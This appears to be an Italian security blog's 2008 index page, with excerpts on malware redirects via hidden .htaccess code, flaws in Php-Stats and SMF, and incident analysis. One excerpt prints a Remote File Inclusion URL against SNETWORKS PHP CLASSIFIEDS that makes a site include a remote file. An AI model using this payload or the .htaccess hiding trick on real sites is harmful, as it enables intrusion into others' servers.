About capn3m0
Sono un geek di 28 anni, innamorato dell'informatica dall'età di 7. Appassionato del Web, dei linguaggi di programmazione e di sicurezza informatica. Nel 2007 ho creato questo sito per raccogliere tutto ciò che apprendo giorno dopo giorno nel mio lavoro in un It Department.
Oggi volevo presentarvi PcRevenge Memory Cleaner 4, software freeware che monitora constantemente le risorse utilizzate di Windows e cerca di liberarne il più possibile tutto in maniera “silent” senza che l’utente debba intervenire.
Dal menu permette inoltre di impostare alcuni “tricks” che migliorano il Boot del proprio Sistema Operativo e la gestione dei Servizi di Windows (suggerisce di disabilitarne alcuni che nella maggior parte delle realtà casalinghe risultano inutili).
Eccovi uno screenshot di come appare il Software:
L'interfaccia di PcRevenge Memory Cleaner
Questo il link diretto al Download.
Continue reading...
In questi giorni, come dicevo nel precedente post, sto analizzando/studiando un tipo di hacking che consiste nel redirettare i visitatori che provengono da un Motore di Ricerca verso una pagina malevola contenente link a Trojan/Malware.
Tale file “.htaccess” nella sua semplicità risulta essere furbo poiché ragiona in due modi:
- Se non è presente alcun “.htaccess” ne crea uno all’insaputa dell’utente con il codice scritto dalla Riga 101 in poi così anche se viene aperto il file non viene visto il codice;
- Se invece esiste già un file “.htaccess” provvedere ad aggiungere 101 righe vuote in coda e successivamente il codice senza modificare quanto già presente. Lo scopo è sempre quello di evitare che l’utente si accorga dell’infezione nel caso apra il file. [...]
Continue reading...
In questi giorni sto lavorando ad un “caso” di hacking che sta infettando un discreto numero di persone e facendo i soliti controlli mi sono imbattuto in una serie di vulnerabilità che affliggono il famoso script di statistiche Php-Stats 0.1.9.2 (utilizzato anche in questo Blog).
[...]
Continue reading...
E’ stata pubblicata da poco (4/10/2008) una vulnerabilità scoperta nella versione 1.1.6 di Simple Machine Forum (o SMF) che permette di bypassare il Filtro che viene applicato al contenuto del post dando la possibilità di scrivere parole censurate, url di siti correttamente funzionanti e visibili, etc.
[...]
Continue reading...
Oggi facendo il mio lavoro sono incappato in un sito con installato lo script “SNETWORKS PHP CLASSIFIEDS” constatando che è vulnerabile a diversi tipi di hacking.
Avevo la necessità di testare alcune vulnerabilità per verificare se il sito che stavo analizzando era stato defacciato a causa di questo applicativo o se invece erano state utilizzate altre tecniche. Ne ho trovate diverse ma per ora vi scrivo la Remote File Inclusion utilizzata che, comunque, si trova facilmente cercando in Rete:
http://[Taget]/[Path]/config.inc.php?path_escape=<url che volete includere>?
[...]
Continue reading...
9 novembre 2008
0 Comments